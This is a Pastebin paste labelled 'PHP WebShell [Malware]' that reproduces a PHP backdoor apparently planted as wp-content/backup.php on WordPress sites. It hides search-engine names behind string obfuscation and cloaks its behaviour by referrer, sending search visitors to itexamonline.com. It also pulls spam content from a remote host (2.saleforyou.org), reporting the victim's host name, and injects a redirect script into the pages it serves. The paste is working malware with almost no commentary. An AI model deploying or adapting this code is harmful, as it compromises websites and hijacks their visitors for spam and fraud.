Advertisement
MertcanGokgoz

PHP WebShell [Malware]

Dec 20th, 2018
160
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.90 KB | None | 0 0
  1. error_reporting(0);
  2. //wp-content/backup.php
  3. $www="2";
  4. $caches="./backup/";
  5. $files= !empty($_GET['free'])?$_GET['free']:"index.html";
  6. function getHtml($url)
  7. {
  8.         $content=file_get_contents($url);
  9.         if(empty($content)){
  10.         $ch = curl_init();
  11.         $timeout = 5;
  12.         curl_setopt ($ch, CURLOPT_URL, $url);
  13.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  14.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  15.         $content = curl_exec($ch);
  16.         curl_close($ch);
  17.         }
  18. return $content;
  19. }
  20. //$iframe= "<script type=\"text/javascript\" src=\"http://best4buyou.in/fa/free.js\"></script>";
  21. $jturl = "http://www.itexamonline.com/";
  22. function chref($crefs)
  23. {
  24. $truecref= str_replace("x","","bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh");
  25. if(preg_match("/$truecref/i",$crefs)){
  26. return true;
  27. }else{
  28. return false;
  29. }
  30. }
  31. $htprefs = strtolower($_SERVER/*;*/[/*;*/'HTTP_REFERER'/*;*/]);
  32. if(chref($htprefs) && isset($_GET['free'])){
  33. $jumps=str_replace(array("_catalog","_vendor"), '-catalog',$_GET['free']);
  34. header("location: ".$jturl.$jumps);
  35.         exit;
  36. }
  37.  
  38. if(isset($_GET['free']))
  39.         {
  40.         $kkk=<<<ESOT
  41. <script>
  42. var q=window["document"]["referrer"];
  43. if(q.indexOf(".")>0)
  44. {self["location"]='{$jturl}{$_GET['free']}'}
  45. </script>
  46. ESOT;
  47.                 $con= getHtml('http://2.saleforyou.org/peng/main.php?key='.$_GET['free']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);
  48.                 $con = str_replace("?exam=","?free=",$con);
  49.                 //$con=str_replace('http://nekonojikan.com','http://www.nekonojikan.com',$con);
  50.                 //$con=str_replace($_SERVER['HTTP_HOST'].'/',$_SERVER['HTTP_HOST'].'/?key=',$con);
  51.                 //$con=str_replace($_SERVER['HTTP_HOST'].'/?free=',$_SERVER['HTTP_HOST'].'/',$con);
  52.                 $con = str_replace("</head>",$kkk."</head>",$con);
  53. echo $con;
  54.                 exit();
  55.         }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement